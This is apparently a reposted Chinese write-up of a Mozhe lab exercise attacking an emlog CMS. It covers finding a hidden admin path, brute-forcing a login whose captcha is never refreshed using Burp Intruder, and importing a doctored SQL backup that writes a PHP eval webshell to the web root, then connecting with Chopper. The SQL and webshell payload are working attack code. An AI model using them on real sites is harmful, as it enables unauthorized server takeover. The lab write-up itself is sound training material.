墨者 - CMS系统漏洞分析溯源(第6题)
作者:互联网
打开环境,根据题目提示
上网搜索emlog博客的后台地址,一般为/admin
但是访问失败,应该是改过路径了
用御剑扫描后台(坑点),只扫出以下地址
分别访问这些地址都没有后台的,后来看别人的解题思路才发现
别人一扫就出来了(换了很多个版本,珍藏版,目录优化版,加强字典版.....均扫不出,一把泪)
这里参考https://blog.csdn.net/weixin_43884770/article/details/85103962
地址是/servlets/
后来直接搜索emlog后台登录漏洞
参考链接:https://blog.csdn.net/Fly_hps/article/details/80580771?utm_source=blogxgwz4
emlog后台登录存在登录漏洞,验证码只要登录一次,
就被记录了,没刷新销毁,导致可以用bp直接暴力破解
还发发现用户mozhe777,和墨者666用户
猜测mozhe777是管理员用户
发送到intruder模块暴力破解,字典这里我用弱口令1500
暴力破解失败请求的居多,观察返回的数据长度length,大部分为2099,只有一个是459
登录成功
要getshell,一般都要找到可以上传文件的地方,然后上传一句话木马
找到数据备份到本地,在txt文末添加如下代码
drop table if exists emlog_shell;
create table emlog_shell(`cmd` longtext not null);
insert into emlog_shell values("<?php @eval($_POST['c']);?>");
select cmd from emlog_shell into outfile '/var/www/html/a.php';
drop table if exists emlog_shell;
解释下这句话意思:如果存在emlog_shell呢就把他删了。然后重新创建一张表emlog_shell,而且只有字段cmd,
longtext类型且不为空,并且插入字段值<?php @eval($_POST['c']);?>,构成一句话木马。
然后将cmd的值读出来outfile文件输出流输出到/var/www/html/a.php,然后把emlog_shell删了
导入,然后就是菜刀无惧链接
链接成功
标签:shell,暴力破解,登录,cmd,emlog,系统漏洞,后台,CMS,墨者 来源: https://blog.csdn.net/qq_39936434/article/details/96849467